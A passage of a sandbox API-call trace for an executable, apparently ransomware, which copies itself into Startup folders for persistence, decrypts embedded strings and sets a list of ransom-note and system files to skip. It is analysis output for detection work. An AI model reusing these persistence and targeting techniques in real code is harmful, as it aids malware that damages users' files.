[0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.518] SetLastError (dwErrCode=0x0) [0039.518] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0039.518] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64c40 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a645f8 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64a28 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61280 | out: hHeap=0x2a60000) returned 1 [0039.524] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61348 | out: hHeap=0x2a60000) returned 1 [0039.524] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc0) returned 0x2a611f0 [0039.524] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc64, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffccc | out: phKey=0xcffccc*=0xf58e28) returned 1 [0039.524] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffcb4, dwFlags=0x0) returned 1 [0039.524] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc80 | out: pbData=0x2a611f0, pdwDataLen=0xcffc80) returned 1 [0039.524] CryptDestroyKey (hKey=0xf58e28) returned 1 [0039.524] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xbd) returned 0x2a612b8 [0039.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b30e4, lpParameter=0x2a612b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0039.525] WaitForSingleObject (hHandle=0x224, dwMilliseconds=0x0) returned 0x102 [0039.525] CloseHandle (hObject=0x224) returned 1 [0039.525] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0039.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x60) returned 0x2a611f0 [0039.525] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc70, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffcd8 | out: phKey=0xcffcd8*=0xf58ee8) returned 1 [0039.525] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0xcffcc0, dwFlags=0x0) returned 1 [0039.525] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc8c | out: pbData=0x2a611f0, pdwDataLen=0xcffc8c) returned 1 [0039.525] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0039.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a61380 [0039.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b30e4, lpParameter=0x2a61380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0039.525] WaitForSingleObject (hHandle=0x224, dwMilliseconds=0x1388) returned 0x102 [0044.579] CloseHandle (hObject=0x224) returned 1 [0044.579] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61498 [0044.579] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffca0 | out: phKey=0xcffca0*=0xf590a8) returned 1 [0044.579] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc88, dwFlags=0x0) returned 1 [0044.579] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61498, pdwDataLen=0xcffc54 | out: pbData=0x2a61498, pdwDataLen=0xcffc54) returned 1 [0044.579] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a614c0 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a614e8 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a611f0 [0044.579] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc78 | out: phKey=0xcffc78*=0xf58ce8) returned 1 [0044.579] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc60, dwFlags=0x0) returned 1 [0044.579] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc2c | out: pbData=0x2a611f0, pdwDataLen=0xcffc2c) returned 1 [0044.579] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.579] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0044.579] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a614c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.579] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614e8 | out: hHeap=0x2a60000) returned 1 [0044.579] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0044.579] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcffce0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcffce0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.579] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614c0 | out: hHeap=0x2a60000) returned 1 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a61498 [0044.579] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a614c8 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc84 | out: phKey=0xcffc84*=0xf59228) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0xcffc6c, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a614c8, pdwDataLen=0xcffc38 | out: pbData=0x2a614c8, pdwDataLen=0xcffc38) returned 1 [0044.580] CryptDestroyKey (hKey=0xf59228) returned 1 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x60) returned 0x2a611f0 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc7c | out: phKey=0xcffc7c*=0xf58ce8) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc64, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc30 | out: pbData=0x2a611f0, pdwDataLen=0xcffc30) returned 1 [0044.580] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x56) returned 0x2a61258 [0044.580] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61258, Size=0xaa) returned 0x2a643e0 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a61258 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x180) returned 0x2a64498 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbe4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc4c | out: phKey=0xcffc4c*=0xf58ce8) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc34, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64498, pdwDataLen=0xcffc00 | out: pbData=0x2a64498, pdwDataLen=0xcffc00) returned 1 [0044.580] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x220) returned 0x2a64620 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbdc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc44 | out: phKey=0xcffc44*=0xf590a8) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc2c, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64620, pdwDataLen=0xcffbf8 | out: pbData=0x2a64620, pdwDataLen=0xcffbf8) returned 1 [0044.580] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a64848 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc1c | out: phKey=0xcffc1c*=0xf58ce8) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc04, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64848, pdwDataLen=0xcffbd0 | out: pbData=0x2a64848, pdwDataLen=0xcffbd0) returned 1 [0044.580] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x84) returned 0x2a648e0 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a64970 [0044.580] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a64a00 [0044.580] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffb8c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffbf4 | out: phKey=0xcffbf4*=0xf58ea8) returned 1 [0044.580] CryptSetKeyParam (hKey=0xf58ea8, dwParam=0x1, pbData=0xcffbdc, dwFlags=0x0) returned 1 [0044.580] CryptDecrypt (in: hKey=0xf58ea8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64a00, pdwDataLen=0xcffba8 | out: pbData=0x2a64a00, pdwDataLen=0xcffba8) returned 1 [0044.580] CryptDestroyKey (hKey=0xf58ea8) returned 1 [0044.580] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64a00 | out: hHeap=0x2a60000) returned 1 [0044.580] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2a648e0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0044.580] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64970 | out: hHeap=0x2a60000) returned 1 [0044.581] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64848 | out: hHeap=0x2a60000) returned 1 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61270 [0044.581] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc18 | out: phKey=0xcffc18*=0xf58e28) returned 1 [0044.581] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffc00, dwFlags=0x0) returned 1 [0044.581] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61270, pdwDataLen=0xcffbcc | out: pbData=0x2a61270, pdwDataLen=0xcffbcc) returned 1 [0044.581] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x18) returned 0x2a61298 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x18) returned 0x2a614e0 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a64848 [0044.581] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffb88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffbf0 | out: phKey=0xcffbf0*=0xf590a8) returned 1 [0044.581] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffbd8, dwFlags=0x0) returned 1 [0044.581] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64848, pdwDataLen=0xcffba4 | out: pbData=0x2a64848, pdwDataLen=0xcffba4) returned 1 [0044.581] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.581] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64848 | out: hHeap=0x2a60000) returned 1 [0044.581] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2a61298, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0044.581] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614e0 | out: hHeap=0x2a60000) returned 1 [0044.581] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61270 | out: hHeap=0x2a60000) returned 1 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64970 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64b88 [0044.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a64b88, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0044.581] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b88 | out: hHeap=0x2a60000) returned 1 [0044.581] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x174) returned 0x2a64b88 [0044.581] GetLastError () returned 0x0 [0044.581] SetLastError (dwErrCode=0x0) [0044.581] GetLastError () returned 0x0 [0044.581] SetLastError (dwErrCode=0x0) [0044.581] GetLastError () returned 0x0 [0044.581] SetLastError (dwErrCode=0x0) [0044.581] GetLastError () returned 0x0 [0044.581] SetLastError (dwErrCode=0x0) [0044.581] GetLastError () returned 0x0 [0044.581] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] SetLastError (dwErrCode=0x0) [0044.582] GetLastError () returned 0x0 [0044.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64b88, Size=0x38c) returned 0x2a64b88 [0044.582] GetLastError () returned 0x0 [0044.582] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64848, Size=0x92) returned 0x2a64f20 [0044.582] GetLastError () returned 0x0 [0044.582] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffca0 | out: phKey=0xcffca0*=0xf58e28) returned 1 [0044.582] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffc88, dwFlags=0x0) returned 1 [0044.582] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61270, pdwDataLen=0xcffc54 | out: pbData=0x2a61270, pdwDataLen=0xcffc54) returned 1 [0044.583] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a611f0 [0044.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61218 [0044.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a64498 [0044.583] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc78 | out: phKey=0xcffc78*=0xf59228) returned 1 [0044.583] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0xcffc60, dwFlags=0x0) returned 1 [0044.583] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64498, pdwDataLen=0xcffc2c | out: pbData=0x2a64498, pdwDataLen=0xcffc2c) returned 1 [0044.583] CryptDestroyKey (hKey=0xf59228) returned 1 [0044.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2a60000) returned 1 [0044.583] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a611f0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0044.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61270 | out: hHeap=0x2a60000) returned 1 [0044.583] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcffce0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcffce0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.583] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0044.583] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a61270 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a612a0 [0044.584] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc84 | out: phKey=0xcffc84*=0xf58ce8) returned 1 [0044.584] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc6c, dwFlags=0x0) returned 1 [0044.584] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a612a0, pdwDataLen=0xcffc38 | out: pbData=0x2a612a0, pdwDataLen=0xcffc38) returned 1 [0044.584] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x60) returned 0x2a611f0 [0044.584] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc7c | out: phKey=0xcffc7c*=0xf58e28) returned 1 [0044.584] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffc64, dwFlags=0x0) returned 1 [0044.584] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0xcffc30 | out: pbData=0x2a611f0, pdwDataLen=0xcffc30) returned 1 [0044.584] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x56) returned 0x2a614c8 [0044.584] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a614c8, Size=0xaa) returned 0x2a604a0 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a60558 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x180) returned 0x2a64498 [0044.584] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbe4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc4c | out: phKey=0xcffc4c*=0xf58ce8) returned 1 [0044.584] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc34, dwFlags=0x0) returned 1 [0044.584] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64498, pdwDataLen=0xcffc00 | out: pbData=0x2a64498, pdwDataLen=0xcffc00) returned 1 [0044.584] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x220) returned 0x2a64620 [0044.584] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbdc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc44 | out: phKey=0xcffc44*=0xf59228) returned 1 [0044.584] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0xcffc2c, dwFlags=0x0) returned 1 [0044.584] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64620, pdwDataLen=0xcffbf8 | out: pbData=0x2a64620, pdwDataLen=0xcffbf8) returned 1 [0044.584] CryptDestroyKey (hKey=0xf59228) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a64848 [0044.584] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc1c | out: phKey=0xcffc1c*=0xf58ce8) returned 1 [0044.584] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc04, dwFlags=0x0) returned 1 [0044.584] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64848, pdwDataLen=0xcffbd0 | out: pbData=0x2a64848, pdwDataLen=0xcffbd0) returned 1 [0044.585] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x84) returned 0x2a648e0 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a64970 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68d80 [0044.585] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffb8c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffbf4 | out: phKey=0xcffbf4*=0xf59228) returned 1 [0044.585] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0xcffbdc, dwFlags=0x0) returned 1 [0044.585] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68d80, pdwDataLen=0xcffba8 | out: pbData=0x2a68d80, pdwDataLen=0xcffba8) returned 1 [0044.585] CryptDestroyKey (hKey=0xf59228) returned 1 [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68d80 | out: hHeap=0x2a60000) returned 1 [0044.585] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2a648e0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64970 | out: hHeap=0x2a60000) returned 1 [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64848 | out: hHeap=0x2a60000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a60570 [0044.585] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc18 | out: phKey=0xcffc18*=0xf590a8) returned 1 [0044.585] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc00, dwFlags=0x0) returned 1 [0044.585] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a60570, pdwDataLen=0xcffbcc | out: pbData=0x2a60570, pdwDataLen=0xcffbcc) returned 1 [0044.585] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x18) returned 0x2a614c8 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x18) returned 0x2a614e8 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68958 [0044.585] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffb88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffbf0 | out: phKey=0xcffbf0*=0xf590a8) returned 1 [0044.585] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffbd8, dwFlags=0x0) returned 1 [0044.585] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68958, pdwDataLen=0xcffba4 | out: pbData=0x2a68958, pdwDataLen=0xcffba4) returned 1 [0044.585] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68958 | out: hHeap=0x2a60000) returned 1 [0044.585] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2a614c8, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614e8 | out: hHeap=0x2a60000) returned 1 [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a60570 | out: hHeap=0x2a60000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64970 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a69320 [0044.585] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a69320, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0044.585] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69320 | out: hHeap=0x2a60000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, 